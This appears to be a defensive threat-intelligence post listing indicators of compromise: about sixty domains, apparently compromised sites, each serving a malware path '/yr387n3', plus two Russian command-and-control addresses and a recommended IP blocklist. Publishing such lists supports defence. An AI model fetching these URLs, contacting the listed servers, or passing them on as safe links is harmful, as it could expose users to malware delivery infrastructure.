pesaroeventi.it/yr387n3
plast-chem.com.pl/yr387n3
pornolartv.net/yr387n3
portalkerjaya.com/yr387n3
premierpromotions.co.uk/yr387n3
prizor.net/yr387n3
prongai.com/yr387n3
pulse-tv.net/yr387n3
puttechnologies.com/yr387n3
reginaautoauction.com/yr387n3
regionalclaimsrecovery.com/yr387n3
richcity.net/yr387n3
right-livelihoods.org/yr387n3
riyuegu.net/yr387n3
rooana.com/yr387n3
ruchengfcw.com/yr387n3
ruwechat.ru/yr387n3
ryrszs.com/yr387n3
sabinemerz.nl/yr387n3
saintsraw.com/yr387n3
sallymills.com/yr387n3
satherm.pt/yr387n3
sayvir.com/yr387n3
semeystvo.com.ua/yr387n3
setoxy.com/yr387n3
shenzhensh.com/yr387n3
shydnt.com/yr387n3
sienaert.org/yr387n3
signumtte.net/yr387n3
siken3d.com/yr387n3
sineria.com/yr387n3
sinmotor.com/yr387n3
sipho.es/yr387n3
skrzeczkowska.com/yr387n3
songpulatex.com/yr387n3
soonmarketing.com/yr387n3
sp-tulun.ru/yr387n3
square100.com/yr387n3
sreekrishnatemple.com/yr387n3
stamperia.pl/yr387n3
stevetoulch.com/yr387n3
stomatolog-implant.ro/yr387n3
sujiaotuoban.com/yr387n3
sunekitty.com/yr387n3
supplyglassess.com/yr387n3
swkitchens.com.au/yr387n3
sydayont.com/yr387n3
tarasarl.com/yr387n3
tehrankhabar.ir/yr387n3
thegarageteam.gr/yr387n3
theoneworld.in/yr387n3
thoraxcenter.ru/yr387n3
tingfenglou.orgfree.com/yr387n3
tolga-tosun.com/yr387n3
trebleimp.com/yr387n3
tyfastener.com/yr387n3
unimarket.ch/yr387n3
uzmanfren.com.tr/yr387n3
vanaken.nu/yr387n3
velolenta.com/yr387n3
videobandnaardvd.com/yr387n3
vmeste-hudeem.ru/yr387n3

The C2s to block are the same as here, namely:

185.118.167.144/information.cgi [hostname: bogdankarpenko1998.pserver.ru] (Chelyabinsk-Signal, Russia)
91.142.90.55/information.cgi (Miran, Russia)


Recommended blocklist:
185.118.167.144
91.142.90.55